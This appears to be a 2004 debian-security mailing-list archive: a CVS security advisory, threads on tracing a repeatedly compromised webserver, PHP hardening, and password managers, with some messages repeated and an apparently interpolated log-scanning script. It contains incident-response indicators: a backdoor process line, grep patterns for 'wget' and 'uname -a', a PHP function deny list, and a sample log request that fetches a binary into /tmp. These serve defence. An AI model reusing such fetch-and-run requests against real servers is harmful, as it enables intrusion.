[SECURITY] [DSA 519-1] New CVS packages fix several potential security problems

2004-06-15 Thread Martin Schulze
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

--------------------------------------------------------------------------
Debian Security Advisory DSA 519-1                     [EMAIL PROTECTED]
http://www.debian.org/security/                         Martin Schulze
June 15th, 2004                         http://www.debian.org/security/faq
--------------------------------------------------------------------------

Package: cvs
Vulnerability  : several
Problem-Type   : remote
Debian-specific: no
CVE ID : CAN-2004-0416 CAN-2004-0417 CAN-2004-0418

Sebastian Krahmer and Stefan Esser discovered several vulnerabilities
in the CVS server, which serves the popular Concurrent Versions
System.  The Common Vulnerability and Exposures project identifies the
following problems:

CAN-2004-0416: double-free() in error_prog_name

CAN-2004-0417: argument integer overflow 

CAN-2004-0418: out of bound writes in serve_notify()

For the stable distribution (woody) this problem has been fixed in
version 1.11.1p1debian-9woody7.

For the unstable distribution (sid) this problem has been fixed in
version 1.12.9-1.

We recommend that you upgrade your cvs package.


Upgrade Instructions
--------------------

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 3.0 alias woody
--------------------------------

  Source archives:

http://security.debian.org/pool/updates/main/c/cvs/cvs_1.11.1p1debian-9woody7.dsc
  Size/MD5 checksum:  693 808c55e071608254b399c5cf8288c478

http://security.debian.org/pool/updates/main/c/cvs/cvs_1.11.1p1debian-9woody7.diff.gz
  Size/MD5 checksum:    55929 5c87146893651805658b497c8d2164f3
http://security.debian.org/pool/updates/main/c/cvs/cvs_1.11.1p1debian.orig.tar.gz
  Size/MD5 checksum:  2621658 500965ab9702b31605f8c58aa21a6205

  Alpha architecture:


http://security.debian.org/pool/updates/main/c/cvs/cvs_1.11.1p1debian-9woody7_alpha.deb
  Size/MD5 checksum:  1178992 d411cdd545809660443ff35d49c6e105

  ARM architecture:


http://security.debian.org/pool/updates/main/c/cvs/cvs_1.11.1p1debian-9woody7_arm.deb
  Size/MD5 checksum:  1106154 5839fcf6673e32d51fc8814591cb49d1

  Intel IA-32 architecture:


http://security.debian.org/pool/updates/main/c/cvs/cvs_1.11.1p1debian-9woody7_i386.deb
  Size/MD5 checksum:  1086800 1283329c4e9337eb1308945ab77738a7

  Intel IA-64 architecture:


http://security.debian.org/pool/updates/main/c/cvs/cvs_1.11.1p1debian-9woody7_ia64.deb
  Size/MD5 checksum:  1272232 e71070f4b415c03b996fbc5e14006094

  HP Precision architecture:


http://security.debian.org/pool/updates/main/c/cvs/cvs_1.11.1p1debian-9woody7_hppa.deb
  Size/MD5 checksum:  1148086 8e70b23bba46da919774913f5b3d3b83

  Motorola 680x0 architecture:


http://security.debian.org/pool/updates/main/c/cvs/cvs_1.11.1p1debian-9woody7_m68k.deb
  Size/MD5 checksum:  1066546 e7f59327f9afdeeec311178839c6997e

  Big endian MIPS architecture:


http://security.debian.org/pool/updates/main/c/cvs/cvs_1.11.1p1debian-9woody7_mips.deb
  Size/MD5 checksum:  1130478 08811baa91dabf7619b2ca9bb3c84fe6

  Little endian MIPS architecture:


http://security.debian.org/pool/updates/main/c/cvs/cvs_1.11.1p1debian-9woody7_mipsel.deb
  Size/MD5 checksum:  1131936 6f51edb9c8f078f8c37ffeb87db686e7

  PowerPC architecture:


http://security.debian.org/pool/updates/main/c/cvs/cvs_1.11.1p1debian-9woody7_powerpc.deb
  Size/MD5 checksum:  1116890 c50418a92b897b0bd698a389a3dd5ba5

  IBM S/390 architecture:


http://security.debian.org/pool/updates/main/c/cvs/cvs_1.11.1p1debian-9woody7_s390.deb
  Size/MD5 checksum:  1097614 1e967b9a0ea2f2feaf4f83b4fb082750

  Sun Sparc architecture:


http://security.debian.org/pool/updates/main/c/cvs/cvs_1.11.1p1debian-9woody7_sparc.deb
  Size/MD5 checksum:  1107928 49e348f931f71a861140995edb0fcd30


  These files will probably be moved into the stable distribution on
  its next update.

--------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: [EMAIL PROTECTED]
Package info: `apt-cache show pkg' and http://packages.debian.org/pkg

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.2.4 (GNU/Linux)

iD8DBQFAzrK8W5ql+IAeqTIRAr8XAJ94PsjJeiEmk+30TWRQqTu20hTyIACeMmZp
xDgNabtz7WdT+TlC3In2tZk=
=iKaZ
-END PGP SIGNATURE-


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL 

Re: Advice needed, trying to find the vulnerable code on Debian webserver.

2004-06-15 Thread Jan Meijer
On Tue, 15 Jun 2004, Ross Tsolakidis wrote:

> I'd appreciate some help on how to stop this from happening.

Run something like aide so you can detect when it goes wrong (though there
are some caveats, it does not sound like they will hit you) and run a
netflow collector next to it, if you can.  That way you can easily
discover where it is coming from and why.

Doesn't the logging on your loghost show anything?

Jan

-- 
/~\ The ASCII / Jan Meijer
\ / Ribbon Campaign-- --SURFnet bv
 X  Against HTML/   http://www.surfnet.nl/organisatie/jm/
/ \ Email   http://cert-nl.surfnet.nl/


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Re: Kernel Crash Bug????

2004-06-15 Thread Rudy Gevaert
Would it be possible to run that program through e.g. perl/php/...?

A user could ftp the executable and write a php script that executes it.

Thanks in advance,

Rudy


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Re: Kernel Crash Bug????

2004-06-15 Thread Russell Coker
On Tue, 15 Jun 2004 17:24, Rudy Gevaert [EMAIL PROTECTED] wrote:
> Would it be possible to run that program through e.g. perl/php/...?
>
> A user could ftp the executable and write a php script that executes it.

Does PHP allow executing arbitrary binaries?

If the user can install CGI-BIN scripts then that's a good way of running a 
kernel security attack (or other local or back-end network attack).

-- 
http://www.coker.com.au/selinux/   My NSA Security Enhanced Linux packages
http://www.coker.com.au/bonnie++/  Bonnie++ hard drive benchmark
http://www.coker.com.au/postal/Postal SMTP/POP benchmark
http://www.coker.com.au/~russell/  My home page


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Re: Kernel Crash Bug????

2004-06-15 Thread Rudy Gevaert
Ignore my message.  I didn't read the URL given above carefully
enough.  It mentions what I asked.


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Re: Kernel Crash Bug????

2004-06-15 Thread David Ramsden
On Tue, Jun 15, 2004 at 05:52:18PM +1000, Russell Coker wrote:
> On Tue, 15 Jun 2004 17:24, Rudy Gevaert [EMAIL PROTECTED] wrote:
> > Would it be possible to run that program through e.g. perl/php/...?
> >
> > A user could ftp the executable and write a php script that executes it.
>
> Does PHP allow executing arbitrary binaries?
>
[snip]

Yes, unless in your php.ini you have something along the lines of:
disable_functions = system,passthru,shell_exec,popen,proc_open

Regards,
David.
-- 
 .''`. David Ramsden [EMAIL PROTECTED]
: :'  :http://david.hexstream.eu.org/
`. `'` PGP key ID: 507B379B on wwwkeys.pgp.net
  `-  Debian - when you have better things to do than to fix a system.




Re: password managers

2004-06-15 Thread Alberto Gonzalez Iniesta
On Tue, Jun 15, 2004 at 12:46:13AM +0200, Stephan Dietl wrote:
> Hello!
>
> andrew lattis [EMAIL PROTECTED] wrote:
> > what does everyone else use to keep track of all their passwords?
>
> Following an article by Martin "Joey" Schulze in a German magazine, I send
> a mail with the password encrypted for myself to me and use it via mutt.
>

I used gringotts, that someone mentioned.

Some of the applications I run use kwallet, which seems similar to what
Russell Coker described for OS X.

But I use vim (+gpg, that is), which is a solution similar to the one
Stephan talks about, but without having to mail yourself every password.

I took it from somewhere I can't remember, so credit goes to whoever wrote it.
What this does is:
- If the file extension is .gpg or .asc, call gpg --decrypt to get the real contents
- Edit the file
- Call gpg --encrypt before writing to disk.

So you keep everything encrypted with your GPG key.

From my .vimrc:

---- cut ----

augroup encrypted
    au!
    " First make sure nothing is written to ~/.viminfo while editing
    " an encrypted file.
    autocmd BufReadPre,FileReadPre      *.gpg,*.asc set viminfo=
    " We don't want a swap file, as it writes unencrypted data to disk.
    autocmd BufReadPre,FileReadPre      *.gpg,*.asc set noswapfile
    " Switch to binary mode to read the encrypted file.
    autocmd BufReadPre,FileReadPre      *.gpg       set bin
    autocmd BufReadPre,FileReadPre      *.gpg,*.asc let ch_save = &ch|set ch=2
    autocmd BufReadPost,FileReadPost    *.gpg,*.asc
    \ '[,']!sh -c 'gpg --decrypt 2> /dev/null'
    " Switch to normal mode for editing
    autocmd BufReadPost,FileReadPost    *.gpg       set nobin
    autocmd BufReadPost,FileReadPost    *.gpg,*.asc let &ch = ch_save|unlet ch_save
    autocmd BufReadPost,FileReadPost    *.gpg,*.asc
    \ execute ":doautocmd BufReadPost " . expand("%:r")
    " Convert all text to encrypted text before writing
    autocmd BufWritePre,FileWritePre    *.gpg
    \ '[,']!sh -c 'gpg --default-recipient-self -e 2>/dev/null'
    autocmd BufWritePre,FileWritePre    *.gpg       set bin
    autocmd BufWritePre,FileWritePre    *.asc
    \ '[,']!sh -c 'gpg --default-recipient-self -e -a 2>/dev/null'
    " Undo the encryption so we are back in the normal text, directly
    " after the file has been written.
    autocmd BufWritePost,FileWritePost  *.gpg,*.asc u
    autocmd BufWritePost,FileWritePost  *.gpg       set nobin
augroup END

---- cut ----

-- 
Alberto Gonzalez Iniesta   | BOFH excuse #399:
agi@(agi.as|debian.org)| We are a 100% Microsoft Shop.
Encrypted mail preferred   | 

Key fingerprint = 9782 04E7 2B75 405C F5E9  0C81 C514 AF8E 4BA4 01C3


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Re: may CAN-2004-041[678] affect on woody?

2004-06-15 Thread Hideki Yamane
Hi,

>   Fri, 11 Jun 2004 20:50:12 +0900, [EMAIL PROTECTED]
>   may CAN-2004-041[678] affect on woody?
>
> Do CAN-2004-0416, CAN-2004-0417 and CAN-2004-0418 not affect
> Debian woody?  Or, is anyone working on merging this fix?

 The answer is "It affects woody", and DSA 519-1 has now been shipped.




-- 
Regards,

 Hideki Yamane    mailto:henrich @ samba.gr.jp/iijmio-mail.jp


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



securing PHP (was: Kernel Crash Bug????)

2004-06-15 Thread Rudy Gevaert
On Tue, Jun 15, 2004 at 09:23:33AM +0100, David Ramsden wrote:
> On Tue, Jun 15, 2004 at 05:52:18PM +1000, Russell Coker wrote:
>
> > Does PHP allow executing arbitrary binaries?
> >
> [snip]
>
> Yes, unless in your php.ini you have something along the lines of:
> disable_functions = system,passthru,shell_exec,popen,proc_open

Can somebody point me to some documentation about securing PHP?

-- 
Rudy Gevaert              [EMAIL PROTECTED]
Web page                  http://www.webworm.org
Schamper sysadmin         http://www.schamper.ugent.be
GNU/Linux user and Savannah hacker http://savannah.gnu.org
On-line, adj.:
The idea that a human being should always be accessible to a computer.


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Re: securing PHP (was: Kernel Crash Bug????)

2004-06-15 Thread Jeroen van Wolffelaar
On Tue, Jun 15, 2004 at 10:35:33AM +0200, Rudy Gevaert wrote:
> On Tue, Jun 15, 2004 at 09:23:33AM +0100, David Ramsden wrote:
> > On Tue, Jun 15, 2004 at 05:52:18PM +1000, Russell Coker wrote:
> >
> > > Does PHP allow executing arbitrary binaries?
> > >
> > [snip]
> >
> > Yes, unless in your php.ini you have something along the lines of:
> > disable_functions = system,passthru,shell_exec,popen,proc_open
>
> Can somebody point me to some documentation about securing PHP?

http://php.net/security. A better solution to the above-mentioned
problem is 'safe_mode', which is intended to block all dangerous file
access, execution, etc.

--Jeroen

-- 
Jeroen van Wolffelaar
[EMAIL PROTECTED] (also for Jabber & MSN; ICQ: 33944357)
http://Jeroen.A-Eskwadraat.nl


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Re: securing PHP (was: Kernel Crash Bug????)

2004-06-15 Thread David Ramsden
On Tue, Jun 15, 2004 at 11:20:35AM +0200, Jeroen van Wolffelaar wrote:
> On Tue, Jun 15, 2004 at 10:35:33AM +0200, Rudy Gevaert wrote:
> > On Tue, Jun 15, 2004 at 09:23:33AM +0100, David Ramsden wrote:
> > > On Tue, Jun 15, 2004 at 05:52:18PM +1000, Russell Coker wrote:
> > >
> > > > Does PHP allow executing arbitrary binaries?
> > > >
> > > [snip]
> > >
> > > Yes, unless in your php.ini you have something along the lines of:
> > > disable_functions = system,passthru,shell_exec,popen,proc_open
> >
> > Can somebody point me to some documentation about securing PHP?
>
> http://php.net/security. A better solution to the above-mentioned
> problem is 'safe_mode', which is intended to block all dangerous file
> access, execution, etc.
>

See also:
 http://www.pookey.co.uk/php-security.xml
 http://www.pookey.co.uk/php-suphp.xml

Regards,
David.
-- 
 .''`. David Ramsden [EMAIL PROTECTED]
: :'  :http://david.hexstream.eu.org/
`. `'` PGP key ID: 507B379B on wwwkeys.pgp.net
  `-  Debian - when you have better things to do than to fix a system.




Re: securing PHP (was: Kernel Crash Bug????)

2004-06-15 Thread Hideki Yamane
Hi,

>   Tue, 15 Jun 2004 10:35:33 +0200, Rudy Gevaert
>   securing PHP (was: Kernel Crash Bug)
> Can somebody point me to some documentation about securing PHP?

 Not documentation, but a patch for PHP: Hardened-PHP.
 http://www.hardened-php.net/


-- 
Regards,

 Hideki Yamane    mailto:henrich @ iijmio-mail.jp


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Re: password managers

2004-06-15 Thread Kenneth Jacker
al> what does everyone else use to keep track of all their passwords?

I've used 'tkpasman' for years ... nice!

http://www.xs4all.nl/~wbsoft/linux/tkpasman.html

-- 
Prof Kenneth H Jacker   [EMAIL PROTECTED]
Computer Science Dept   www.cs.appstate.edu/~khj
Appalachian State Univ
Boone, NC  28608  USA


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Re: password managers

2004-06-15 Thread Micah Anderson
Try kedpm, it's a Debian package, and has console as well as GUI
support and uses the FPM data, really nice.

micah

On Tue, 15 Jun 2004, Kenneth Jacker wrote:

> al> what does everyone else use to keep track of all their passwords?
>
> I've used 'tkpasman' for years ... nice!
>
> http://www.xs4all.nl/~wbsoft/linux/tkpasman.html
>
> --
> Prof Kenneth H Jacker   [EMAIL PROTECTED]
> Computer Science Dept   www.cs.appstate.edu/~khj
> Appalachian State Univ
> Boone, NC  28608  USA
 
 


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Re: password managers

2004-06-15 Thread Kenneth Jacker
micah> Try kedpm, it's a Debian package, and has console as well as
micah> GUI support and uses the FPM data, really nice.

Thanks for the suggestion!

Though I found a web site for 'kedpm':

  http://kedpm.sourceforge.net/

the following returns no Debian packages:

  http://packages.debian.org/kedpm

nor did sourceforge (only tar files):

  https://sourceforge.net/project/showfiles.php?group_id=87161

Where are the Debian packages?  ;-)


Also, a question: one thing I like about 'tkpasman' is the feature
which allows two X11 pastes (e.g., username & password) immediately
after selecting a passworded site.  Very convenient ...

How is the info transferred out of 'kedpm'?

  -Kenneth


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Re: [OT] Spam fights

2004-06-15 Thread Alain Tesio
Here is a list of junk subject patterns in case someone is interested.

Alain


junkMailPatterns.gz
Description: Binary data


Re: Spam fights

2004-06-15 Thread Alain Tesio
Can the mailing list software add an X-Subscribed: yes/no line to the
mail headers?  Then people can decide whether to filter it out or not.

Alain


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



RE: Advice needed, trying to find the vulnerable code on Debian webserver.

2004-06-15 Thread Ross Tsolakidis
> Wipe, install, set up chkrootkit and run it often.
I've already done that.  There was no rootkit.

> How does phpnuke compromise apache if apache is set up correctly?
I believe it's some of the modules available and running php with 'safe
mode off'.

I need to find the vulnerable code on this box.  And I have no idea
where to begin.
I've tried running virus scans, nothing is infected.


--
Ross



-Original Message-
From: s. keeling [mailto:[EMAIL PROTECTED] 
Sent: Tuesday, 15 June 2004 2:06 PM
To: [EMAIL PROTECTED]
Subject: Re: Advice needed, trying to find the vulnerable code on Debian
webserver.

Incoming from Ross Tsolakidis:
 
> One of our webservers seems to get compromised on a daily basis.
> When I do a ps ax I see these processes all the time.
>
> 18687 ?        S      0:00 shell
> 18701 ?        Z      0:00 [sh defunct]
> 18704 ?        T      0:00 ./3 200.177.162.185 1524

I vaguely remember that 3 in /tmp is slapper.  Wipe, install, set up
chkrootkit and run it often.

How does phpnuke compromise apache if apache is set up correctly?


--
Any technology distinguishable from magic is insufficiently advanced.
(*)   http://www.spots.ab.ca/~keeling 
- -


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact
[EMAIL PROTECTED]



DISCLAIMER: This e-mail and any files transmitted with it may 
be privileged and confidential, and are intended only for the use of the 
intended recipient. If you are not the intended recipient or responsible for 
delivering this e-mail to the intended recipient, any use, dissemination, 
forwarding, printing or copying of this e-mail and any attachments is strictly 
prohibited. If you have received this e-mail in error, please REPLY TO the 
SENDER to advise the error AND then DELETE the e-mail from your system.
Any views expressed in this e-mail and any files transmitted with 
it are those of the individual sender, except where the sender specifically 
states them to be the views of our organisation.
Our organisation does not represent or warrant that 
the attached files are free from computer viruses or other defects. The user 
assumes all responsibility for any loss or damage resulting directly or 
indirectly from the use of the attached files. In any event, the liability to 
our organisation is limited to either the resupply of the attached files or the 
cost of having the attached files resupplied.



Re: Advice needed, trying to find the vulnerable code on Debian webserver.

2004-06-15 Thread David Ramsden
On Tue, Jun 15, 2004 at 02:32:21PM +1000, Ross Tsolakidis wrote:
> > Wipe, install, set up chkrootkit and run it often.
> I've already done that.  There was no rootkit.
>

An alternative to chkrootkit is rkhunter - it's a set of scripts. You
can find the web address on something like freshmeat.net or Google
easily.

[snip]

> I need to find the vulnerable code on this box.  And I have no idea
> where to begin.
> I've tried running virus scans, nothing is infected.
>
>
[snip]

The files you found within /tmp - grep Apache's access /and/ error logs
for these file names. Other common things to grep for include the use of
uname -a, ls -l, wget, remembering you may need to substitute a
space for %20:
 # grep -i 'uname%20-a' {access,error}.log
 # grep -i 'wget' {access,error}.log

How about running a packet sniffer on port 80 too and monitor the
traffic. Log to a text file and grep that?

HTH.
David.
-- 
 .''`. David Ramsden [EMAIL PROTECTED]
: :'  :http://david.hexstream.eu.org/
`. `'` PGP key ID: 507B379B on wwwkeys.pgp.net
  `-  Debian - when you have better things to do than to fix a system.


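Added here as a worked example (not code from David's post or from any project mentioned in the thread): a POSIX shell version of the grep above that URL-decodes each Apache log line before matching, so that `uname%20-a`, `uname+-a` and `%75name%20-a` all hit one indicator list. The sample log, its IPs and the `url_decode`/`scan_access_log` helper names are constructed for the demonstration.

```shell
#!/bin/sh
# Added example: apply the "grep the Apache logs for uname -a / wget / ls -l"
# advice to a constructed sample log. Requests arrive URL-encoded, and the
# same command can be spelled "uname%20-a", "uname+-a" or "%75name%20-a",
# so each line is decoded before grepping; one pattern list then covers
# every spelling. Everything below is constructed (IPs are RFC 5737 ranges).

set -eu

# Decode %XX escapes and '+' on every stdin line (POSIX awk only, so it runs
# with the awk/grep already on a 2004-era box). Each output line is prefixed
# with its original line number so a hit can be traced back to the raw log.
url_decode() {
    awk '
    function hexval(c) { return index("0123456789abcdef", tolower(c)) - 1 }
    {
        s = $0
        gsub(/[+]/, " ", s)     # form-encoded space ("+1000" TZ offsets also change; harmless here)
        out = ""
        while ((i = index(s, "%")) > 0) {
            out = out substr(s, 1, i - 1)
            h = substr(s, i + 1, 2)
            if (h ~ /^[0-9A-Fa-f][0-9A-Fa-f]$/) {
                out = out sprintf("%c", hexval(substr(h, 1, 1)) * 16 + hexval(substr(h, 2, 1)))
                s = substr(s, i + 3)
            } else {            # a lone "%" that is not an escape stays literal
                out = out "%"
                s = substr(s, i + 1)
            }
        }
        print NR ": " out s
    }'
}

# Indicators taken from the thread: post-compromise commands and the /tmp
# path where the "3" binary turned up. Matched case-insensitively against
# the *decoded* line.
INDICATORS='uname -a|ls -l|wget|/tmp/'

# Print every decoded log line that matches an indicator (no hits is not an error).
scan_access_log() {
    url_decode < "$1" | grep -i -E -- "$INDICATORS" || true
}

# Number of matching lines as a plain integer (wc -l pads with spaces on some systems).
count_hits() {
    scan_access_log "$1" | awk 'END { print NR }'
}

# Constructed sample in Apache combined format. Lines 2-4 are the kind of
# requests the thread describes, each encoded differently; 1 and 5 are benign.
SAMPLE_LOG=$(mktemp)
trap 'rm -f "$SAMPLE_LOG"' EXIT
cat > "$SAMPLE_LOG" <<'EOF'
192.0.2.10 - - [15/Jun/2004:14:06:01 +1000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/4.0"
198.51.100.7 - - [15/Jun/2004:14:06:09 +1000] "GET /index.php?q=uname%20-a HTTP/1.0" 200 812 "-" "-"
198.51.100.7 - - [15/Jun/2004:14:06:12 +1000] "GET /index.php?q=wget+http://198.51.100.7/3+-O+/tmp/3 HTTP/1.0" 200 640 "-" "-"
198.51.100.7 - - [15/Jun/2004:14:06:15 +1000] "GET /index.php?q=%6Cs%20-l%20/tmp HTTP/1.0" 200 300 "-" "-"
192.0.2.22 - - [15/Jun/2004:14:07:40 +1000] "GET /images/logo.png HTTP/1.1" 304 0 "-" "Mozilla/4.0"
EOF

# A plain grep for 'uname%20-a' finds only line 2; after decoding, lines 2, 3
# and 4 are all reported.
scan_access_log "$SAMPLE_LOG"
```

Run it against the real logs with `scan_access_log /var/log/apache/access.log` (path assumed); the error log can be passed the same way since the decoder is format-agnostic.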


Re: Advice needed, trying to find the vulnerable code on Debian webserver.

2004-06-15 Thread TiM
Look at installing mod_security, http://modsecurity.org
Install some rules for it to harden your webserver, see if anything is 
flagged in the security log.

Ross Tsolakidis wrote:
> > Wipe, install, set up chkrootkit and run it often.
> I've already done that.  There was no rootkit.
>
> > How does phpnuke compromise apache if apache is set up correctly?
> I believe it's some of the modules available and running php with 'safe
> mode off'.
> I need to find the vulnerable code on this box.  And I have no idea
> where to begin.
> I've tried running virus scans, nothing is infected.
> --
> Ross
 

 




Re: Advice needed, trying to find the vulnerable code on Debian webserver.

2004-06-15 Thread Alvin Oga

hi ya

On Wed, 16 Jun 2004, TiM wrote:

 
> Look at installing mod_security, http://modsecurity.org
>
> Install some rules for it to harden your webserver, see if anything is
> flagged in the security log.

other web server testing tools
http://www.linux-sec.net/Web/#Testing

c ya
alvin


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Re: password managers

2004-06-15 Thread Russell Coker
On Tue, 15 Jun 2004 18:46, Alberto Gonzalez Iniesta [EMAIL PROTECTED] wrote:
> Some of the applications I run use kwallet, that seems similar to what
> Russell Coker described for OS X.

No.  kwallet can be ptraced, which allows a hostile program to get access to
all its data with ease.

Of course in OS/X I expect that you could fool the password manager somehow to 
get access.  But at least they stop ptrace.

Also kwallet seems to have no features for restricting access to data.

-- 
http://www.coker.com.au/selinux/   My NSA Security Enhanced Linux packages
http://www.coker.com.au/bonnie++/  Bonnie++ hard drive benchmark
http://www.coker.com.au/postal/Postal SMTP/POP benchmark
http://www.coker.com.au/~russell/  My home page


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Re: Advice needed, trying to find the vulnerable code on Debian webserver.

2004-06-15 Thread s. keeling
Incoming from Ross Tsolakidis:
 
> One of our webservers seems to get compromised on a daily basis.
> When I do a ps ax I see these processes all the time.
>
> 18687 ?        S      0:00 shell
> 18701 ?        Z      0:00 [sh defunct]
> 18704 ?        T      0:00 ./3 200.177.162.185 1524

I vaguely remember that 3 in /tmp is slapper.  Wipe, install, set up
chkrootkit and run it often.

How does phpnuke compromise apache if apache is set up correctly?


-- 
Any technology distinguishable from magic is insufficiently advanced.
(*)   http://www.spots.ab.ca/~keeling 
- -



Re: Kernel Crash Bug????

2004-06-15 Thread Rudy Gevaert
Would it be possible to run that program trough e.g. perl/php/... ?

A use could ftp the executable and write a php script that execute it.

Thanks in advance,

Rudy



Re: Kernel Crash Bug????

2004-06-15 Thread Russell Coker
On Tue, 15 Jun 2004 17:24, Rudy Gevaert [EMAIL PROTECTED] wrote:
 Would it be possible to run that program trough e.g. perl/php/... ?

 A use could ftp the executable and write a php script that execute it.

Does PHP allow executing arbitary binaries?

If the user can install CGI-BIN scripts then that's a good way of running a 
kernel security attack (or other local or back-end network attack).

-- 
http://www.coker.com.au/selinux/   My NSA Security Enhanced Linux packages
http://www.coker.com.au/bonnie++/  Bonnie++ hard drive benchmark
http://www.coker.com.au/postal/Postal SMTP/POP benchmark
http://www.coker.com.au/~russell/  My home page



Re: Kernel Crash Bug????

2004-06-15 Thread Rudy Gevaert
Ignore my message.  I didn't read the url give aboven carefully
enough.  It mentions what I asked.



Re: Kernel Crash Bug????

2004-06-15 Thread David Ramsden
On Tue, Jun 15, 2004 at 05:52:18PM +1000, Russell Coker wrote:
 On Tue, 15 Jun 2004 17:24, Rudy Gevaert [EMAIL PROTECTED] wrote:
  Would it be possible to run that program trough e.g. perl/php/... ?
 
  A use could ftp the executable and write a php script that execute it.
 
 Does PHP allow executing arbitary binaries?
 
[snip]

Yes, unless in your php.ini you have something along the lines of:
disable_functions = system,passthru,shell_exec,popen,proc_open

Regards,
David.
-- 
 .''`. David Ramsden [EMAIL PROTECTED]
: :'  :http://david.hexstream.eu.org/
`. `'` PGP key ID: 507B379B on wwwkeys.pgp.net
  `-  Debian - when you have better things to do than to fix a system.


pgpIAtiLt2TfI.pgp
Description: PGP signature


Re: password managers

2004-06-15 Thread Alberto Gonzalez Iniesta
On Tue, Jun 15, 2004 at 12:46:13AM +0200, Stephan Dietl wrote:
 Hello!
 
 andrew lattis [EMAIL PROTECTED] schrieb:
  what does everyone else use to keep track of all there passwords?
 
 Following an article of Martin Joey Schulze in a german magazine i send
 a mail with the password encryted for myself to me and use it via mutt.
 

I used gringotts, that someone mentioned.

Some of the applications I run use kwallet, that seems similar to what
Russell Cooker described for OS X.

But I use vim (+gpg, that is). Which is a solution similar to the one
Stephan talks about, but without having to mail yourself every password.

I took it from somewhere I can't remember so credit goes to whoever wrote it.
What this does is:
- If the file extension is .gpg or .asc, call gpg --decrypt to get the real 
contents
- Edit the file
- Call gpg --encrypt before writing to disk.

So you keep everything encrypted with your GPG key.

From my .vimrc:

- cut 

augroup encrypted
au!
 First make sure nothing is written to ~/.viminfo while editing
 an encrypted file.
autocmd BufReadPre,FileReadPre  *.gpg,*.asc set viminfo=
 We don't want a swap file, as it writes unencrypted data to disk.
autocmd BufReadPre,FileReadPre  *.gpg,*.asc set noswapfile
 Switch to binary mode to read the encrypted file.
autocmd BufReadPre,FileReadPre  *.gpg   set bin
autocmd BufReadPre,FileReadPre  *.gpg,*.asc let ch_save = ch|set 
ch=2
autocmd BufReadPost,FileReadPost*.gpg,*.asc
\ '[,']!sh -c 'gpg --decrypt 2 /dev/null'
 Switch to normal mode for editing
autocmd BufReadPost,FileReadPost*.gpg   set nobin
autocmd BufReadPost,FileReadPost*.gpg,*.asc let ch = ch_save|unlet 
ch_save
autocmd BufReadPost,FileReadPost*.gpg,*.asc
\ execute :doautocmd BufReadPost  . expand(%:r)
 Convert all text to encrypted text before writing
autocmd BufWritePre,FileWritePre*.gpg
\ '[,']!sh -c 'gpg --default-recipient-self -e 2/dev/null'
autocmd BufWritePre,FileWritePre*.gpg   set bin
autocmd BufWritePre,FileWritePre*.asc
\ '[,']!sh -c 'gpg --default-recipient-self -e -a 2/dev/null'
 Undo the encryption so we are back in the normal text, directly
 after the file has been written.
autocmd BufWritePost,FileWritePost  *.gpg,*.asc u
autocmd BufWritePost,FileWritePost  *.gpg   set nobin
augroup END

--- cut 

-- 
Alberto Gonzalez Iniesta   | BOFH excuse #399:
agi@(agi.as|debian.org)| We are a 100% Microsoft Shop.
Encrypted mail preferred   | 

Key fingerprint = 9782 04E7 2B75 405C F5E9  0C81 C514 AF8E 4BA4 01C3



Re: may CAN-2004-041[678] affect on woody?

2004-06-15 Thread Hideki Yamane
Hi,

  Fri, 11 Jun 2004 20:50:12 +0900, [EMAIL PROTECTED]
  may CAN-2004-041[678] affect on woody?

May CAN-2004-0416, CAN-2004-0417 and CAN-2004-0418 not affect
on Debian woody?  Or, may anyone works for merging this fix?

 The answer is It affects woody and now DSA 519-1 was shipped.




-- 
Regards,

 Hideki Yamanemailto:henrich @ samba.gr.jp/iijmio-mail.jp



securing PHP (was: Kernel Crash Bug????)

2004-06-15 Thread Rudy Gevaert
On Tue, Jun 15, 2004 at 09:23:33AM +0100, David Ramsden wrote:
 On Tue, Jun 15, 2004 at 05:52:18PM +1000, Russell Coker wrote:

  Does PHP allow executing arbitary binaries?
  
 [snip]
 
